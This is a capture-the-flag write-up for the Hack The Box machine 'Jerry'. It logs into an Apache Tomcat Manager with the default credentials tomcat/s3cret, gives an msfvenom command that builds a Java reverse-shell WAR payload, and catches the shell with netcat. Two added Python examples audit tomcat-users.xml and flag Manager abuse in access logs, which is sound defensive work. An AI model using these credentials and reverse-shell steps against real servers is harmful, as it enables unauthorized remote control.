Hack The Box Jerry Write-Up



Nmap reveals that port 8080 is open, so let's visit port 8080 in a web browser.

Apache Tomcat/7.0.88
Basic access authentication

To access the Tomcat Manager we need a valid username and password. When we enter an invalid username and password we get a 403 Access Denied message.

403 Access Denied

Let's try the username tomcat and the password s3cret.

Once we successfully authenticate we're brought to the Tomcat Web Application Manager. The Tomcat Manager has an option to upload .war files to the server.

Tomcat Web Application Manager
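The credentials that open this Manager live in Tomcat's conf/tomcat-users.xml, so the defensive counterpart of this step is auditing that file. The following is an added example written for this write-up, not code from the original post or from Apache Tomcat: it parses a tomcat-users.xml, and flags any user holding a Manager role whose credentials are on a known-weak list, equal the username, or are short, and any user holding both manager-gui and manager-script (a combination the Tomcat documentation advises against). The two configurations, the weak-credential list and the deploy-ci account are constructed samples; the tomcat/s3cret pair in the list is the one this write-up logs in with.

```python
"""Audit a Tomcat tomcat-users.xml for weak Manager credentials.

Added example for this write-up; not part of the original post or of
Apache Tomcat. The configuration strings and the weak-credential list are
constructed samples.
"""
import xml.etree.ElementTree as ET

# Roles that grant access to the Manager / Host Manager applications.
MANAGER_ROLES = {
    "manager-gui", "manager-script", "manager-jmx", "manager-status",
    "admin-gui", "admin-script",
}

# Constructed list of credential pairs an auditor treats as known-weak.
# (tomcat, s3cret) is the pair used in this write-up.
KNOWN_WEAK = {
    ("tomcat", "tomcat"), ("tomcat", "s3cret"), ("tomcat", "manager"),
    ("admin", "admin"), ("admin", "password"),
}

MIN_PASSWORD_LENGTH = 12

# Constructed sample mirroring the weak setup the write-up logs into.
WEAK_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users>
  <role rolename="manager-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
</tomcat-users>
"""

# Constructed corrected form: a long random password and only the scripting
# role (no browser GUI) for a dedicated deployment account.
HARDENED_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users>
  <role rolename="manager-script"/>
  <user username="deploy-ci" password="Xq7!vR2m#Lp9wT4zHb6n" roles="manager-script"/>
</tomcat-users>
"""


def audit_tomcat_users(xml_text):
    """Return a list of (username, reason) findings for Manager-capable users."""
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root.iter():
        # Tomcat 8+ declares a default namespace; strip it so both forms match.
        if elem.tag.split("}")[-1] != "user":
            continue
        name = elem.get("username", "")
        password = elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        if not roles & MANAGER_ROLES:
            continue  # a user without Manager roles cannot deploy applications
        if (name, password) in KNOWN_WEAK:
            findings.append((name, "known-weak credential pair"))
        elif password == name:
            findings.append((name, "password equals username"))
        elif len(password) < MIN_PASSWORD_LENGTH:
            findings.append((name, "password shorter than %d characters" % MIN_PASSWORD_LENGTH))
        if "manager-gui" in roles and "manager-script" in roles:
            findings.append((name, "holds both manager-gui and manager-script"))
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label + ":", audit_tomcat_users(cfg) or "no findings")
```

Run against the two samples, the weak configuration produces one finding for the tomcat user and the hardened one produces none. Tomcat also supports storing digested rather than plaintext passwords in this file; the length and equality checks above only make sense for plaintext entries.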


We can use msfvenom to generate a Java reverse-shell payload packaged as a .war file.

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=4444 -f war > cmd.war

Upload and deploy the reverse shell, then visit

Let's open a netcat listener to catch the shell, which connects back once our cmd.war file is executed.
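Every step above (the failed logins, the successful login and the WAR deployment) leaves a line in Tomcat's access log, which is where a defender would spot this sequence. The following is an added example written for this write-up, not code from the original post or from Apache Tomcat: it parses lines in Tomcat's default AccessLogValve format (%h %l %u %t "%r" %s %b), raises an alert when one source reaches a threshold of 401/403 responses on /manager, records every successful deployment through the Manager's upload or deploy endpoints, and raises a second alert when a deployment comes from a source that had earlier authentication failures. The log lines, IP addresses, timestamps and CSRF nonce are constructed samples.

```python
"""Flag suspicious Tomcat Manager activity in an access log.

Added example for this write-up; not part of the original post or of
Apache Tomcat. Parses Tomcat's default AccessLogValve line format.
All sample log lines below are constructed.
"""
import re
from collections import defaultdict

# %h %l %u %t "%r" %s %b  ->  host ident user [time] "METHOD path proto" status bytes
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Manager endpoints that deploy a new web application (HTML upload form,
# HTML deploy-from-server form, and the text/script interface).
DEPLOY_RE = re.compile(r"^/manager/(html/(upload|deploy)|text/deploy)\b")

# Constructed sample: a burst of failed Manager logins, a successful login,
# a WAR upload from the same source, and an unrelated legitimate deployment.
SAMPLE_LOG = """\
10.10.14.5 - - [21/Jun/2018:14:02:11 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.5 - - [21/Jun/2018:14:02:13 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.5 - admin [21/Jun/2018:14:02:15 +0000] "GET /manager/html HTTP/1.1" 403 3022
10.10.14.5 - - [21/Jun/2018:14:02:17 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.5 - tomcat [21/Jun/2018:14:02:20 +0000] "GET /manager/html HTTP/1.1" 200 14852
10.10.14.5 - tomcat [21/Jun/2018:14:02:41 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC123 HTTP/1.1" 200 -
192.168.1.20 - - [21/Jun/2018:14:05:02 +0000] "GET /docs/ HTTP/1.1" 200 5102
192.168.1.21 - deploy-ci [21/Jun/2018:14:06:30 +0000] "PUT /manager/text/deploy?path=/shop&update=true HTTP/1.1" 200 -
"""


def analyze_access_log(text, failure_threshold=3):
    """Return (kind, host, user) alerts in log order.

    kinds: manager-auth-failures   - host reached failure_threshold 401/403s on /manager
           manager-deploy          - successful request to a deploy endpoint
           deploy-after-auth-failures - deploy from a host with earlier failures
    The user field is the %u value of the line that triggered the alert.
    """
    failures = defaultdict(int)
    alerts = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # tolerate lines in another format instead of aborting
        host, user = m.group("host"), m.group("user")
        path, status = m.group("path"), m.group("status")
        if not path.startswith("/manager"):
            continue
        if status in ("401", "403"):
            failures[host] += 1
            if failures[host] == failure_threshold:
                alerts.append(("manager-auth-failures", host, user))
        elif status == "200" and DEPLOY_RE.match(path):
            alerts.append(("manager-deploy", host, user))
            if failures[host]:
                alerts.append(("deploy-after-auth-failures", host, user))
    return alerts


if __name__ == "__main__":
    for alert in analyze_access_log(SAMPLE_LOG):
        print("%-28s host=%-14s user=%s" % alert)
```

On the sample, the attacking source trips the failure threshold on its third attempt and its upload is reported twice, once as a plain deployment and once as a deployment following authentication failures, while the deploy-ci account's deployment is reported only as a routine deployment that an operator can allow-list. Since the Manager application is rarely needed from arbitrary addresses, a tighter policy is to alert on any /manager request that is not from an approved deployment host.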

The Flag is located in


Both the user and root flags are written in the file "2 for the price of 1.txt", which can be read with the type command.

type "2 for the price of 1.txt"
